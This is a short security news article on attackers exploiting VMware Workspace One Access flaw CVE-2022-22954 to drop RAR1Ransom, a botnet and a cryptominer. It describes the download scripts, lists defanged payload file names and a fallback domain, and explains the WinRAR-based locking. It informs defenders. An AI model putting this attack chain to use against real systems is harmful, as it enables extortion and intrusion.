HQ/EMEAFind out how we can help your business
Threat actors exploited a critical vulnerability inside the VMware Workspace One Access to deliver malware strains like the RAR1Ransom tool. This malicious kit could lock files in archives protected by passwords.
Based on reports, the current incident is enabled by a flaw tracked by researchers as CVE-2022-22954, an RCE bug activated through server-side template injection. According to researchers, the threat actors deployed the Mira botnet for launching a distributed denial-of-service attack, the RAR1Ransom tool, and the GuardMiner cryptominer.
Fortunately, VMware immediately released security updates when the vulnerability was identified a few months ago. However, the product attracted many threat groups after a Proof-of-Concept was released by the ones who discovered the flaw.
Other threat actors have also abused the VMware vulnerability.
Last May, a report from a separate researcher warned organisations regarding the VMware vulnerability being targeted by the EnemyBot operators. However, a change in the attacks was observed by researchers in August since the actors used the bug for data exfiltration to send miners, lockers, and DDoS.
Additionally, there are cases in which the threat actors used a pair of PowerShell and Bash scripts to target Windows and Linux OS. The scripts retrieved a list of files to deploy on the infected devices.
The PowerShell script downloads several files from a Cloudflare IPFS gateway, such as the config[.]json, networkmanager[.]exe, phpupdate[.]exe, clean[.]bat, phpguard[.]exe, and encrypt[.]exe.
The researchers claimed that every script indicated earlier is assigned distinct tasks like data encryption and cryptocurrency mining. Once the Cloudflare resource is not ready for the attack, the malware will use a backup link at the crustwebsites[.]net domain.
The RAR1Ransom is a standard ransomware kit that exploits WinRAR for compressing targeted files and locking them with a password. In addition, this tool does this to specific file types, which is typical for ransomware payloads and eventually attaches the rar1 extension.
Finally, the threat actors will drop ransom notes demanding the payment of 2 XMR to a given wallet address. Today, 2 XMR costs nearly $150. The files are still unavailable without a valid password, even though the attack has no encryption method.
